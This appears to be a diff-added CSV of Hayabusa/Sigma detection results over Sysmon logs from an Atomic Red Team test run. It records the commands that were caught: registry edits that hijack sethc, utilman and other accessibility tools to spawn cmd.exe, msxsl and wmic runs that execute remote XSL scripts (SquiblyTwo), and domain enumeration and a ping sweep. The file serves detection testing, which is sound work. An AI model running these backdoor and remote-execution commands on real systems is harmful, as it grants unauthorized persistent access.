+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe  process /FORMAT:list  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic.exe  process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  view /domain  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net  view  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""net view""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Windows Network Enumeration,,rules/sigma/process_creation/win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.1  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.2  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.3  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.4  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.5  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.6  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping  -n 1 -w 100 192.168.1.7  :  Path: C:\Windows\System32\PING.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
